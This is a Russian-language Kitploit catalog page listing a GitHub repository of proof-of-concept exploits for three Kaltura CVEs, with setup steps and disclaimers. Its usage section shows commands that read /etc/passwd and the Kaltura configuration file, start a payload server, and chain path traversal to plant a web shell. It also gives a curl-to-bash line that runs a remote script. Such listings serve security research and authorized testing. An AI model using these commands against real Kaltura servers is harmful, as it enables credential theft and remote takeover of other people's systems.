Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — Эксплойты proof-of-concept для CVE-2026-19912, CVE-2026-19913 и CVE-2026-19914, демонстрирующие чтение файлов и удалённое выполнение кода в Kaltura, предназначенные для авторизованного тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

Эксплойты proof-of-concept для CVE-2026-19912, CVE-2026-19913 и CVE-2026-19914, демонстрирующие чтение файлов и удалённое выполнение кода в Kaltura, предназначенные для авторизованного тестирования безопасности и обучения.

Репозиторий
8 ч 25 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

Пожертвования

Помогите поддерживать этот проект

Если вы находите этот проект полезным, пожалуйста, рассмотрите возможность поддержки его дальнейшего развития через PayPal или ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ Десять процентов каждого пожертвования направляется в Детскую больницу Кантха Бопха.

Выберите способ оплаты

Donate securely with PayPal

ABA Mobile donation QR code
Сканируйте с помощью ABA Mobile · Нажмите, чтобы увеличить

⚡ Простое использование

Запустите последнюю версию внешнего скрипта загрузки напрямую из GitHub:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

Эта команда требует Bash и curl. Просмотрите удалённый скрипт перед запуском, если вы не доверяете источнику.

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  • Локальные виртуальные машины
  • Docker-контейнеры
  • Изолированные лабораторные стенды
  • Авторизованные среды тестирования на проникновение

Пример настройки:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Проект использует python, следуйте инструкциям ниже

# Создайте виртуальное окружение
python -m venv venv

# Активируйте виртуальное окружение

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Установите зависимости
pip install -r requirements.txt

Пример использования:

root@kitploit:~
# 1. Чтение файла (наиболее надёжно, работает как описано в статье)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. Только сервер полезной нагрузки (используйте с Burp / curl вручную)
python3 kaltura_poc.py serve --lport 8888

# 3. Полный скелет цепочки
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

Авторство или ссылки

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 Образовательный репозиторий по безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.


⚠️ Отказ от ответственности по безопасности и правовым вопросам

Назначение

Этот репозиторий предназначен только для образовательных и авторизованных исследований в области безопасности.

Он создан, чтобы помочь пользователям узнать о:

  • Уязвимостях безопасности
  • Концепциях песочниц и изоляции
  • Безопасном кодировании и защитных практиках

Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  • Личные лаборатории или виртуальные машины
  • Docker или изолированные среды
  • Авторизованное тестирование на проникновение
  • Обучение кибербезопасности или академические исследования

Несанкционированное или незаконное использование строго запрещено.


Отсутствие ответственности

Автор и участники не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или потери, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  • Вы несёте ответственность за свои собственные действия
  • Вы будете использовать его законно и этично
  • Проект предоставляется без каких-либо гарантий

Этичное использование

Этот проект предназначен для:

  • Исследований в области защитной безопасности
  • Обучения кибербезопасности
  • Повышения осведомлённости об уязвимостях
  • Исследований безопасных систем и программного обеспечения

Пожалуйста, соблюдайте практики ответственного раскрытия информации и соблюдайте все применимые законы.


Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.


Связанный проект

Изучите Коллекцию PoC CVE для получения дополнительных ресурсов с доказательствами концепций CVE, предназначенных для авторизованных исследований в области безопасности и образования.

Скачать инструмент